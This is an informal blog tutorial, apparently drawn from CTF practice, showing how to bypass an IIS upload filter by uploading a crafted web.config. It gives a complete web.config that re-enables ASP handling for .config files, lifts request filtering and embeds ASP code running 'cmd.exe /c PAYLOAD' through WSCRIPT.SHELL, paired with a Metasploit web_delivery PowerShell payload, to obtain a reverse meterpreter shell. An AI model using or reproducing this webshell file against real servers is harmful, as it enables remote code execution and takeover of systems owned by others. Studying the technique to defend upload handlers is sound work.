recently i have started doing CTF’s and their i have learned a lot of new stuffs and this is one of them which is quiet easy but tricky. 😉
You got an uploader on an IIS server which accepts files only with extension ‘.png‘ , ‘.jpg‘ .
If you try uploading files
- with extension ‘.png‘ , ‘.jpg‘ it will be uploaded.
- with extension ‘.aspx‘ , ‘.asp‘ it will show an error like this as they are not allowed to upload.
- but if you try to upload a ‘web.config‘ it will get uploaded 😉
so you guys will ask what this ‘web.config‘ is all about ?
It is a configuration file based on xml which is used to set rules and behavior of specific directories. We can relate it to ‘.htaccess’ of Linux based servers which is used to set rules and behavior of specific directories.
Ex (rules and behavior) :-
- Enable / disable firewall rules.
- Read / write permissions.
- Controlling database connection strings.
- Setting up error behavior and security measures.
Exploiting this vulnerability :-
So we will try to get a reverse shell by uploading a crafted ‘web.config’ .
[STEP – 1] SETTING UP LISTENER
will use metasploit “web_delivery” module for it.
as we know that our target system is running IIS (i.e windows) so we generated the powershell payload.
[STEP – 2] UPLOADING WEB.CONFIG TO GET REVERSE SHELL
On step-1 we have got a powershell payload now we have to configure it into our web.config file. Below you can see a XML code save it as web.config and change its red section “PAYLOAD“ with the powershell payload.
CODE (web.config) :-
<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <handlers accessPolicy="Read, Script, Write"> <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> </handlers> <security> <requestFiltering> <fileExtensions> <remove fileExtension=".config" /> </fileExtensions> <hiddenSegments> <remove segment="web.config" /> </hiddenSegments> </requestFiltering> </security> </system.webServer> </configuration> <!-- <% Response.write("-"&"->") Response.write("Spider Sec") Server.CreateObject("WSCRIPT.SHELL").exec("cmd.exe /c PAYLOAD ") Response.write("<!-"&"-") %> -->
now execute the web.config
Now you will get a meterpreter session 🙂
hope you guys will like it
Follow us on twitter : @SpiderSec